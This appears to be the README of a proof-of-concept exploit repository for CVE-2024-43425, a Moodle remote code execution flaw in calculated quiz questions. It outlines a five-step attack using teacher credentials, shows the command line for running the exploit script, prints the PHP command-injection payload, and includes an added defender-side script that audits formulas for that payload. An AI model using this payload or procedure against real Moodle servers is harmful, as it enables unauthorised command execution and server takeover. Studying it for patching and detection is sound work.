Introduction
# CVE-2024-43425-Poc
## CVE Overview
- CVE ID: CVE-2024-43425
- Description: Moodle allows an authenticated teacher-level user to upload a malicious calculated question via the quiz editor interface.
- Impact: Remote Code Execution (RCE)
- Cause: Improper sanitization of mathematical payloads inside calculated questions, which leads to command injection through the dataset wizard.
## Requirements:
- Valid login credentials
- Access to quiz editing interface (usually a teacher or admin role)
- Known cmid (quiz module ID) and courseid
## This script performs a 5-step attack:
| Step | Description |
|------|-------------|
| 1 | Fetch login token (logintoken) |
| 2 | Log in and establish a valid MoodleSession |
| 3 | Extract sesskey, ctxid, and category from the quiz edit page |
| 4 | Upload a specially crafted calculated question with an RCE payload |
| 5 | Trigger the payload through the dataset wizard page |
## Usage Instructions
Requirements:
- Python 3
- Python libraries: requests, bs4 (BeautifulSoup)
~~~
pip3 install requests bs4
~~~
~~~
python3 exploit_cve_2024_43425.py \
--url http://192.168.2.12/moodle \
--username test \
--password 'Test@123' \
--courseid 1 \
--cmid 1 \
--cmd 'whoami'
~~~
## Payload used:
~~~
answer[0] = "(1)->{system($_GET[chr(97)])}"
~~~
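A defender-side check for the payload shape above, as an added example that is not part of the original PoC or of Moodle: a strict allowlist audit for calculated-question answer formulas that reports everything that is not plain arithmetic. The names `audit_formula` and `ALLOWED_FUNCS`, the function allowlist, and the assumption that dataset placeholders are simple identifiers in braces are all illustrative.

```python
import re

# Assumption: illustrative allowlist, not Moodle's actual function list.
ALLOWED_FUNCS = {"abs", "sqrt", "pow", "sin", "cos", "tan", "log", "exp",
                 "round", "floor", "ceil", "min", "max", "pi"}
# Assumption: dataset placeholders are simple identifiers such as {a} or {x1}.
PLACEHOLDER = re.compile(r"\{[A-Za-z][A-Za-z0-9_]*\}")
TOKEN = re.compile(r"\s*(?:(\d+(?:\.\d+)?|\.\d+)|([A-Za-z_]\w*)|(.))")

# The answer formula quoted in this README, used here only as audit input.
README_PAYLOAD = "(1)->{system($_GET[chr(97)])}"
# Constructed benign formula for comparison.
BENIGN_FORMULA = "{a} + {b} * sqrt({c})"


def audit_formula(formula):
    """Return the reasons a formula is not plain arithmetic (empty if clean)."""
    findings = []
    # Swap well-formed placeholders for a literal so only the residue is judged.
    residue = PLACEHOLDER.sub("1", formula)
    depth = 0
    for number, name, symbol in TOKEN.findall(residue):
        if number:
            continue
        if name:
            if name.lower() not in ALLOWED_FUNCS:
                findings.append(f"identifier not allowlisted: {name}")
        elif symbol in "+-*/%^,":
            continue
        elif symbol == "(":
            depth += 1
        elif symbol == ")":
            depth -= 1
            if depth < 0:
                findings.append("unbalanced ')'")
                depth = 0
        elif symbol.strip():  # ignore whitespace, flag everything else
            findings.append(f"character not allowed: {symbol!r}")
    if depth:
        findings.append("unbalanced '('")
    return findings


if __name__ == "__main__":
    for label, formula in (("benign", BENIGN_FORMULA), ("readme", README_PAYLOAD)):
        print(label, audit_formula(formula) or "clean")
```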
File snapshot
[4.0K] /data/pocs/a767e76dd6cc30ac0aad2bf820d1fd436ffab910
├── [9.6K] exploit.py
└── [1.2K] README.md
0 directories, 2 files